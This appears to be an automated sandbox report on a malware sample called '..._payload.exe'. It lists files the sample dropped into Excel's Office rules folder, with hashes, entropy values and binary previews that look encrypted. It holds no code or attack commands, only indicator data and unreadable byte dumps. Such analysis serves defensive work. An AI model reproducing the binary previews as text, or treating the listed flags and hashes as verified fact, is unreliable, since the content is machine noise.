                                                                                                                                                                      Preview:<?xml...t:f..s.?.A.H.. .u'...O`.n......S.k".......z..;...m.a.....^O...S..:}G.........:...G.....m..P..$.4...=....or.&v..,.N.F&xT..FA........._*...L.#....).........P6EE.}.d..b.^6.....]...."..@..f...,........r.....0../d9....:....C........-\.a.i.B3.EUK..?9:Q5pFv.[t....'.&......X.H.....:>.k.....s.+..2.....N_.m.E.c./SQ..8...5..].Vl..DM/h...^...u.s..*......i.e.GV.u...Ud.=lAs:.%.q.s.X$..6%.....P9.0A.'....E!s.......VVQ..=.E92.8.$...6.$..b1..!.q..>....,....v...c?s.x2X.*.ci&.....{......J,.*........2._...v...,0\.)....-|.9......\.A..i.NB.....<.[d.4.z?..#..eD..;.AN..B...;&8.$...Ae...Z.=g.|)9..j.U....C..K.(&=d.-.,.@..M..5..$..7..}.}.\.`y..7..^...^KN....|mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490030v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1037
                                                                                                                                                                      Entropy (8bit):7.778832804082157
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:L9Fl5XvBm4SURyaU3+jOqDZIu274Glxzdm2bD:h9Xv0LyjO+IuQ4G7JtD
                                                                                                                                                                      MD5:044AA585DFCB80B4229E67FB79BB005D
                                                                                                                                                                      SHA1:DE3393396A04F76054FA168F8562D6A072F03D1D
                                                                                                                                                                      SHA-256:9C2B1474FA2ADA8B6472DB2CA792499417B963E5F47E5FC4767A1FCFE2258D4B
                                                                                                                                                                      SHA-512:57D39489168AF51DC29D0F77C152716583C0C858A1FEF857CBC269ECC196FFA3FC2CB7423283F1D243DDCB20343FFBE422228E9FEB6FED15442EBF828BC64DE1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...x...O|.^..2._`...1...G......d)'..QQ.....2.I..S.a.S}.$....D(...+..6.Mh,.<I..AE#;....Q$.]....0&.r.?.Y.Ci......Yxh....3.N.O.^I...C.t..j...qJ.c...........g>.v..h^K.D....9.yjV...:..l....J....<q.....V..??w..z`Rw..N_.r_$F.o.8e....?.A2l..<y...l.T.g......-..e.-.....Q.........1.G!:1..M.l[l.(..&.-\F...F.h...A.5......n...y..W.P.#|....).Hy.W.<.j..o...i..|76Ec.m.+.L*..7e..y$.S..<..y..W..;..N..Z...X....xz. .Q.".;......m.........Y{1=.l......lY.e2...D..D.u.$...>v.....'o...V.<.......x;.o..U...A....=.7?.^%.C......]...j.V..........)...9.].....NE..'0Nz....:..<.jPw.W..?2..H..y..^.....W^b...-.....>....)..B............b.:uA.T......[ft.P...g..g1.R......@.]B.C.M.<.(.xk!..Y..+....W.Y...x|..b..#!.....x..gH`.l.....G<.6...H.I4'g..T.j.q.u...7..`b.G.ST....@]*..n.}ojn{..#......2..-=..>9....eN...^,..s.aV.p.....cbz%..v+......>.~..UV.[....@.4..y..O.....C.e.[<....I.5.K..+....e...+.8j..$6h.....$f..sq...m...y..n.V.p.S!i.93~.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490031v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):920
                                                                                                                                                                      Entropy (8bit):7.787707256185106
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:PDq4tW5/kN41M7pipL3zbC5U5DvYu2dak6ljf0Ng9PB2bD:Pumac21M7pYbCy5vYzdak6loXD
                                                                                                                                                                      MD5:7C15C4131AC9E801B0585854E6F1F3E5
                                                                                                                                                                      SHA1:843D796561E4BE6607CA6F608C1EB0AE27BEDAD6
                                                                                                                                                                      SHA-256:F8FF071BC239279658E7D7255250906BD967A7A03AD39A6F871E035A00512BF5
                                                                                                                                                                      SHA-512:72BB79DAFE899259455B67F98A22A77990AC078473BFB705901C9408119ABAA075A16DFAA27AC28CEEDDC92DC63D02C2209F95681FF85A93DFE1E90A545A27B3
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlG+. ^?l...@......g.I.sB#4.........q....Q...Q..|C..7.m....oBgH..d.N......{4..L..........&..6..o....mm.^......NT..k"W.i.r...{p..Z.I..#3.6...C..+l.^.R..9s.E........y(........B&..].....,.......l...T....mT`.....<w..U..=...2......o6...xT....E.....#.i....j.n....?..;.Ft~...&.v...WEG^.?V.....9C..=u..C.[..".\K....<.?.......Ntg.....*.;.{.E.*\-u...'.....0.....$2..u..>|...|_.,.P!#q{..n...J.0.L.7ld..p.m.GF.......R?h6l'.,."......h|..L...B8..H,I...W.....i.z...f....F.Y>..A6..0.M8..p...%.x.....$}....y...>e.i....1..m.....z.!.c..%.ee.....`H;.I..b..3.|....f......z....3..e(`.M...5..Lh.._.O>......#.&..~M........B..!.C.!D.O)y.........]....0fJ.....]_..{.....h./..P]..Z.m..k......m.[n.^.~..c;.L....^..8&...r1V.t#b...2{...l..k.k..i^5..>.........3....V.t...K.....h?X=.....-....Hy..t...z........l.x..Yr.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500000v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1147
                                                                                                                                                                      Entropy (8bit):7.786900055168292
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:9kAy/LvIBEmHqG+gHHYRj5KGZQApWkYrsH0d/Tp2zp8bn7/kQCt+za2bD:pyzAFHTHHa5KaVyr60d/qe7cQvRD
                                                                                                                                                                      MD5:DC50BB856B82FCB10C9EA5C501A4011B
                                                                                                                                                                      SHA1:25662DCFCD77572FAEE5D3A8C2F9B82689DE7393
                                                                                                                                                                      SHA-256:E2C0F7432F8DE8E8E346F31CA11B96985C9FCFC8732F182FCDF032B19329DBC7
                                                                                                                                                                      SHA-512:70218F3173B69865FD28E82173C1E25F4D9B0A2CBBF224B99B837EDF8D70D3F6EAC307E50130A0E5F653B07118CF394A1E840A95BA6E8A0EB0719B5EAE57CDD1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..+...27.@T.|..C..Gt.~..^./$....F..W.....)1.%.m.sy...li.2.K.....~...a..'...0.Q.u..'...\9..4>.>...-.>?..a.z.x....b.(.k.8.x8....(U.y...[t...`<.U....B...#M0H.V.l.......9 .G.[5X..KcB zyT...[x]...+]..#H..#.....0"..r}..C..a...{z.R..i$=_..R.....}......9.....?.x...`.C..h.@.&^n4.&H..s...._..?MB.}h.u...<E-.-.G.@=\..T..l.E..\&.$V/....`.:...uL.z....E..x....".A$T$..r#..X..z......o..?O..s..|.-.!.-.^7....l..u.....5..e&........;....n^....KL!......z....4D...s..B...?Z...F.:...-...@...m.#.bW0.>......m.....u..\.,1._.r....h...T..|.;R.+..%msA..jne..i....o......[..Ii....4Sr.$..{..&...#A4.x.m...........*..2EvRH.e..h.}....A5.>.....&.6..i.-.ns.$.V`.CB.........p...[n_d.....\V..[..7.$.(..0.....JH...m.D.%}.....H&.VzR.q..%.}.H.@.^BT.YGQ6.>.j..ZP.[.]..@....."hw.1x...[`t1.e^.^.Q......K.SQ.F.s.u.~.2.......v.....Yx..!.I+..D=.............".SX..1.K......y..f.'|q.., G0.g?X...X.J.(C...!.....Vc1..g:.......%P9;.f.~...?51./c+..g.8U.K5..XQ.&........&.. ).

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500001v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1141
                                                                                                                                                                      Entropy (8bit):7.817599594950972
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:6rwP6EauAhq/5432J0BGXH4AyEP4uvoaoFLDrQuluPcvcE+2bD:6wP6EauS32JY8QF38uEUfD
                                                                                                                                                                      MD5:6582D0B553DAE22CAC42934ADC7B63B2
                                                                                                                                                                      SHA1:3AB799DEBE8DE5BC6E0A6770B6ED1A460747CD72
                                                                                                                                                                      SHA-256:2BA4C42393EBF44EC53FC4B0D46FB4B362859C26BD4011C629B2CC656835C682
                                                                                                                                                                      SHA-512:D83F3E0CE8C9697E53DD548FA66CD07407F1F76A637F568009DD4B03E7CCC5A4D36DE427A9DDE306D88D765E939EE2A15922ADBD022CFE5641A25C476E90F776
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...s.........H.)..F....1.>.G.F....)..9K.........R..2....._y...........a.h;..ww`.._K..!O.{..#y..z.....M.1..;AE..)..|..q!..!....u.-.f......@.$...}[..8,.{...<.N..x.....>..k...Kf..4."k">..}..u..=b........Yw3P..3.qS.B.2F.xpr.(_27.#9+..C.+T.@.~zY.....<l9,O....N.M.....W.#...P.ZTL...F'G.f...~..n<.#sG..".(?<..,e.@)....(.y<.H.luQ.A..G4f....["......._,^...3.P.V..2..iq.\.'..?..n.........-.%...P.d.....G9..O.g...M...2.K.%..UL..`.p......?..].y.W..%0i8jI...c.v..[..X z.....;.nQg#..8)y.hZh.1.j.;|[.N........Q......(P...........m97..u...M.TF.W..T&.^.K..l..N.J..(.L.8.&....h.G.g.yX%......a $....Z.nES.c0TL8..n=4r.....l. .j..#]2XQ....N.T}.w.5./.....Pp...Z...(g_...H...t..(U(...w[.A...Em.n....!...V&1...s;-=(.~a\L....Jc.....]".<.=)!6..n...e[...h#.#.Pc|3.....v...X.....[.+..F<A1Z~..:w.Xn.dZ.WwMk`N...12...._.Z>.U[A.x.@..+....3.N...<9.u.....p.B.nK.1@.T?.%9..b.i'......1W:..(..].e.W...*.I.....W l..Q$....^......R..q.?... K.8.11....Cg....{....sD.$.`<.u..*..,.......b.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500002v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1145
                                                                                                                                                                      Entropy (8bit):7.8406561326316355
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:2jgFuB+sqJKDs6PMDAmq6w2BXD/a7r30gBnq0O+4v2bD:2jOuB+sqMDc57w2BTCFnq3+jD
                                                                                                                                                                      MD5:386B59BC7511207968C124C115AD5A6D
                                                                                                                                                                      SHA1:1DEB2AA02B784C44E9B17425F5CED73062BEE80A
                                                                                                                                                                      SHA-256:F793241F09DEC21826E9825A0F3BA95415EFB352511419725005D28AF415CCA2
                                                                                                                                                                      SHA-512:45B3DD6E8C26E9B6AC444FBCFD05C225BD2C13746096013174A2870C3EEF63D2DF39F444BB3E1E7AF79B07C3B442246AE6232792153CFC1A04A9C8FA811078CB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.@...e}..c`6.C.m...e.I..c.....J...V.0Wpu...4a..9../.^...Z.6...z..y/......d...o...2i..\...88j...sH"/..b....7....kK.x:.}9...]Z...{.....ftYP<.^.'d...>.9.).J...%k..'.{!Y-Q...*. .,.F...qO5...[.......... ..M,....c.S.....e."....^.}:po.q..?.>/.....N^t...g...lF#g.h%..U.N.$..C/.......|...W...U.....hj..L..d....8.I...).h..C2.`...r...j....*.Q=!.Mo...k\z..7~r..|L.~..`......N..l....rT).K+...+..F.A.~.i!i....../..*L..wpn.........K|6<......\s..F..a%..ib..)*.......~..:....Yc...B8h........cf.-*.{.h.j..N...4...u;.^mrA.6C.&..}.WR...q......]I{.8..r`</.A8.....5....|.A.e.RhgB.'....GE....)....../V.l...-......S{O..............a...L_.nCo...R.i..:F....0|..S.M..,;.|....A.yQ.Q&.;...,1u.t..[.......(......|.U..~..|y..(.o._.....a..}...b......G.x....5.wvX.Zz.H[z.!..._...d.%..6.!..X4>K......l..2]zQ...1(.M.O.9.)...S.+....oK-]=.5.)h@.z....Zi....b.u.85.w.....RT.H.>....I......j5...]>.e..U4...p.Q@.KE...AZ...z...iE.=[...s......#.P...t...!.y.9..<Y.T..N......N..XJ.R&....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500003v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1145
                                                                                                                                                                      Entropy (8bit):7.816235792117984
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:guG9nYzU9rMWTxPP0qm5wsOb7YS5JLJWKCKusMZbKv5gRkc6uVoI2bD:gu1zUow8qmascYS5JJWKCRNNKvqoco7D
                                                                                                                                                                      MD5:AB2D4AF98A98B0EE3F171D08AB98B024
                                                                                                                                                                      SHA1:00CEFA56BFD74239D7EC460CB640A824A821BC4E
                                                                                                                                                                      SHA-256:0045899C0AE0BF4BA1E58CCF26713E09D77270037258EE0E37850F9EBCF825B4
                                                                                                                                                                      SHA-512:54AE173B2E90428723B7872623EBDFA19082D95328F1E7E8714ABEC225056493F66DCA0BE857066CE1825F524394A6872436B04938961E3E2BEE4339D12EBCD2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml]....z~...E.\.....z.W9...7.;...fg....M.!X.....B....q=#dG..f...+b..i..;+&.pT...p.g.I./..C..8U^.^/..5..C.x{R...V........R8.0....9m.m._.H.9.z..q...1j..#...Y...x..._|....l......~....u..@.~L.x.s..w.;c.....$..{......f...I.;....>..2......#.....l.......z."P.....w.........A{7p.=....e.... (.. !5.=.......=.. /7...]..X...d...0Vq.k9...p..:.d...l..+G.(..k...=3.a0....+&.2{.r.g...8.m.b6.0...C.!F.O.uG...#...qib..AGHf..}.&....`.D.$.j...D..<..au..........AS.27...V...?/..a..^.............S...@....XS....3eW........)x.S.mc....q.-.+..V.],.V.\...>...@.I.....}.U..X.>.H.$....]@m.C.vr.8.{.....+o......z......R}.... .....?q....%..`....7.#..J....fD..e..PB..M...f{s..Omq.X...z.e^.f..F.ft.....D...2?_.........3..Z........"...8*H.}....... .~.....z.w....nR.j.<..r....D...x..i...I.]hU&."f./c6.M.1...:D...EsI..l.......vP..i.#.H.9._.y..;'L...,...F..ln{.....o........U51.DZv.7....i..T.VO..C.5{.......J..e/.]r...K.~...mt..........7...... .I. ...".....O%...W.Ov...M..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500004v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1145
                                                                                                                                                                      Entropy (8bit):7.824198479074206
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:UQ053ZltxSI4BNbuFWd+mZKTvlffhRRmIhsCUTrtseDv8DgWAJqqRP2bD:AJltxSlNwgQZRRP2ZDv8DtbD
                                                                                                                                                                      MD5:6B2FFE025F1767A3BB42AC865282682B
                                                                                                                                                                      SHA1:547AE5609A303B1DEA622A201440843FCE41567D
                                                                                                                                                                      SHA-256:242C0C6C1F58BF5B7805AB2AD2FC35AD84EEA192EB66C0DBA77D46AA3F08EDD3
                                                                                                                                                                      SHA-512:8CE0DE7D223B94DCA2E16726744DA33B311B8E58B3026ABEE426BA6E21434E80CD093F0A2CFAADF592EEC29D2071A0C9C48D7C60EF8BB00E7A81D49CB5512286
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml....]..U_k.D.c.....y..."..B^..b..l..G....W..^......M#.".%..:..Mh.......C...AF..N.i....D1X*d`"/G...g.+.@&wo#.K-c.%... ....b..n..|......C..h...r.+H..s.r;.3.69..8.tBi+...~.u......0.[vX.G....y..y*`Yi.&..^.;......)...`...M...|:"...S.Nb..F.$.8w..C.{.*.X.^.s=...............h.@...Sq.R..xpL~...S.:..F.ms..cj.KbC.4A..I;.m.d.,.9/qe~.[c.'..0#.W..2t......P........hi.......|....<4...md@& >..N..G.....F......../mUz..tS.,>/k.v...h!.}.J.k...1..zZL..E."..p./'V..QV}H."......t...-..(.....U.' h.q.S. _.......n.?..|z.H".4.yF..<GT..C.#z..g.[K&....a`A..h.-........{H..M. vyu.......A-d.........7-x%.....u....(.6.g.X...f:._...@...j...~|....?c.p..T.....@.U9k.N.>.....}*..V....U1S............=g....H.(....n.......>;.z..Q......E..&).M.?.....t....I.,J$.D..t.w....].h.$sDj.[..J.Q..$p7..e#.M......>..9...st....,..e<8.....P..=..b.........e.r..s.!.).Pl.9.N..6.9.p...1.....}..1..Z...[..=s{.-.......8_.Mk..~.+-wK......,.o..dS...\Y.N..._x&$...B1. .+.........-....d.F....py.A....0mW...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500005v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1144
                                                                                                                                                                      Entropy (8bit):7.810653533632909
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:UjUTHJv9db7re7zh0Jr65HNF/on+oTN3exqrGj1AezcDZCoer12bD:S2HJ91767KJen0BN3Um9MrOD
                                                                                                                                                                      MD5:CC4DE8922F73212B6B139B52AE3ACB39
                                                                                                                                                                      SHA1:B345B65603660B2017B6CA1D4F06885010068F8C
                                                                                                                                                                      SHA-256:E2005F5C298FF6C587C6B2A362F0298447EEE485BCCBC86D9093995E27C1CC97
                                                                                                                                                                      SHA-512:4A7347123E78B9D083386E6FA6E5D871E515018F6FCE48A1B9850253EDDF52A1B2012260F4F8B332FEBDDFC8F3D91398192DEAF03A062BE6E4A28F234778CAF2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlt..v0e{.!..]..?.......m..........N."p.6.5..:.w..O.(.W..9..........qm..&.S..4UA.a..C^"......`.>iH..].....5|.8(./..0...O..y..GH.cT.E8....d...6.. .|.'.c....|.5.SK[2J[7.#{.....7....IH..#..U......z.Z.r.:}%.FQ[.?......m.<~......V...].o.T........g.X*..4.;x..}.h.B.ff..)M........vw=...7~9...`.......2h..V...By.{...v5#./<..?.\.....I....6.wO....!...7".[.r."A*..M~....m(8.}.........&5..8.;..F..Mn.N......e.G0..4.eW.C...(..+...T.....Y.Q.E...I...?RUI$;.x&E").J.T<.H...\M.6.J.}~..P.=.F....qwJ_.D...v.o.$O...Fu*..8Y.E....Y.Wm......%.a...A..4,.w?S|a...T4.E.z6V.,0.`2..V..U..8..I.l.pC...~~..q..u..s....j....:.7ed.*. ..^S?.....b..x@....,......'.g...-O.....K.Y.Z..c..f.{".0..p....W&..W.=&*Fx...G.....9..N....rX.Y..Q...7...y..V...8t....j.1....sL...O..fp..9:.S...tE..O...P..,.% .-.D....B......'.7...)..Gg....=k.A.....f.fa6.*........Zg.-...(`..F..........`P.s=...5..b.>...2./..v.f...h.B...H.Z....2s.FB..5....f..2.......p5...W.p=...Gl...F{....MKr.-.&-..k..x..f

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500006v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):848
                                                                                                                                                                      Entropy (8bit):7.736129464917056
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:yHZXhS6Ke6/oxLtSf0EHWO4QxPtZPdzjmGPSqZN3o0w2bD:yvK6LcZHW7QxPtZPdvyqH3o0jD
                                                                                                                                                                      MD5:732BA03CF42D40B8F48D8B229A10DBF0
                                                                                                                                                                      SHA1:42C9AD7A9647EBC99D5E967FF4058BE511A98EA4
                                                                                                                                                                      SHA-256:2E16E90536B4D15A7D1E24973AC72D4616443329B2A0F031D782FBFBB95A9DE7
                                                                                                                                                                      SHA-512:3645B59671C72677B6E5AF499BF91C0984BBB66EEDE01E0F5A25F2B9B3C5AA529D2480325D3F6577223EB39FD0AE85D97A41EE97959E6EBE59A61DC074A4B7A9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..>.Fw......\....j....7.o.5.....U...\H..f..~.2S.V1.a.cCH...'.y:!.}.S...t.(.7.z..P....v.....r.;.>m.\$G.+...Z....*.H...#]..:1.p.HQ$v%.....GI.@w...p.....R;..D....&P|.."nzy..-.....k....L...80.a....xV.X..v....C...}...B....R.\.....,..>...g...).U...8>.=O..`3...-..'y..[.+2.zL..l.s.?......w).}sCL9.2.........8.......x.....V...3..Q..E..........iw.~...A.2.b...`..V.........Ket*.|...z..U.......I....4p..N).....{..?W.}..O<..../{..FJf.......>.;..w......p......c..E.hW..t`.:..@YI..\..(.....h\5Z.....E.....e../...[\^.......M.r.p.).<..xA.i.t.@!E.$.D?r,.6...`...,r......k.9m.f. .7...%.-........;...7.7rS..D.8'...`..Vcb`6.w-.~...A.}x.....C.H]..d...f>..$g.F.)....B .)...~..Y...s..V...b...6.0.i~&...]....u....up7.........Q[w.[...:..0mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500007v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):767
                                                                                                                                                                      Entropy (8bit):7.702390306247523
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:4I/EC1UyWDMNXLR2GvDrIoTo067KzVPqE4YjfCjwH/OgfIxgqnViIdrSSUdNciik:3ECYDObR2GvoRKZiQjfCO2gf4gqnViow
                                                                                                                                                                      MD5:9F423F16554EEB123D407EEC18DBAB88
                                                                                                                                                                      SHA1:4B3747C7A85C97787567083F07AE8DDBBABA3E93
                                                                                                                                                                      SHA-256:8763728EAC4E8F1D1BD022C28E6D58EF227F3DF56EE08E3C21FEDCA44101B534
                                                                                                                                                                      SHA-512:E842D0A66C97CBB997F7B9DDE557F8F646DD50A191C8B3AB3A531A323737A3444024F25CA389D82FB65A8ECAD886EF7792F742E3136CB3AEAECBC52544A12746
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml *......hr.-..eeg?.?.8m...-.e".N.4...*.>E......+.np...d..A..[isO.r.u...lvx...I..j..1S....s.l.e..q....(\.d.iy...T..y .w6r...Os-..=\........u.-.x...ANt.M......K..\...4...$.'.F......X:.`q.V.*}.....{.A....ud../..#^\....Y.erB..GOF;6. ...........8..Q.&..F.4.FL@#....m......|...........*..~'>&....}`...YPv..gO.....u..x....&.X....N..~0...<.......7t.?8......@.._..t.....;X5.....W.[.Q.5....[3..W...A...7H.!i.@!.../{...AD!0...R..x~..M...w.>.=.+.@..........@.[.......R.ma...{r...Gk;.G ...s....5....o..h....#...^{.t..l.=.Y...@v=..}.v.I...c.E...\>&..K9..6...8.&............oy.NoJM.DWY..J.w.W6....4eLN\..(.....`..[...9-.../..3@&)..;.F;yl.)..Y..v.?q...CW]...).X.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500008v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):845
                                                                                                                                                                      Entropy (8bit):7.745763673841024
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:B1kIKJOpKVrWZW/mc1Zb3vq7QOX2j352bD:B1PyOMVrWZWP1FvqkCD
                                                                                                                                                                      MD5:0C546A16A6D0788B972DAFDD5A474883
                                                                                                                                                                      SHA1:939685A54D9D14B44187E9B24AFB54FEC87EEAB3
                                                                                                                                                                      SHA-256:F254FCB4936D0BC7EA4C75AD0391B2053D1DA73A32AABC968207C7A42A5503A6
                                                                                                                                                                      SHA-512:D63D8DCADD9523839FB480FAA4414CFF18673AB7F39B48978971CA1F828B5F40EEE992463ED07F06875A761342ACC2EAE850453E40A9D2E3B67089718734DD46
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.C;~-..O....(\.A.....m...Y..,.. ......g>..|....Q...\.w.r..0j6..}...........`=.S|k...b..:..F....wJ.B...I.y.z..f.^....O.7..:U......TZ.x.L.t...z.@tF,j.9.Ej.<9(..x....A-/?v........A...H..=nY.\.:g.G...v..r.s\..pe...v...n.l...2.!...x...+Ry......=,r.#...EN....W.....wA.c{...#".uP..A........V)...?.p.v=[C.;Q..z.\\.3E......Q.%.........s'.......=W.....q.!....9......CnO).@......R9<.|.9.......h.)..t...r..+&A..".Q..7.uxj..;..._]..."..b.f.R..%.@O..|./.....B.ux.G./.B...e..f.u$[j..:.c4e7.ZdA.z2BnF*>......../.N.W.b.K..U.#N..hpz......h....Zu.......P3..[iQ#M.|.W..1.]e*.*1\...........k.....A_"Z.@j.t.../.c.{.....P).......]a.....K.f2..GC7]*......D0..1.0..e.t.Zr5..].B.t...I5...9#vV...~CR....]Ll.....K.VZ...#U.g...k[...\..8\o.......%...m...'mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500009v4.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1233
                                                                                                                                                                      Entropy (8bit):7.824614396602365
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:lCGRYBG6o5Au2+TpREEZrUb65cbvPVE+gmc/POmQEAQNOpJ+c7sW+2bD:x61y2+VREIrpkHVE+gmOOmQCOpJr7sWd
                                                                                                                                                                      MD5:DD95E98A0D987815AC8AAD529B36C838
                                                                                                                                                                      SHA1:8CF4B15CA5FE2DD55A3F83E8F167793C38B983E2
                                                                                                                                                                      SHA-256:F8DB200242DBDE1105A59B550E295115ED20503CCEF99A3C187A4DF14D6D74A7
                                                                                                                                                                      SHA-512:CF40ED414E75B66BADF863262AA318E2733982267C4C9EDA55687B734DE2FC507C47BA9772850EB4B72E51162AC0C8DFAEA462A9378188DD9F0396178A9A3D21
                                                                                                                                                                      Malicious:false
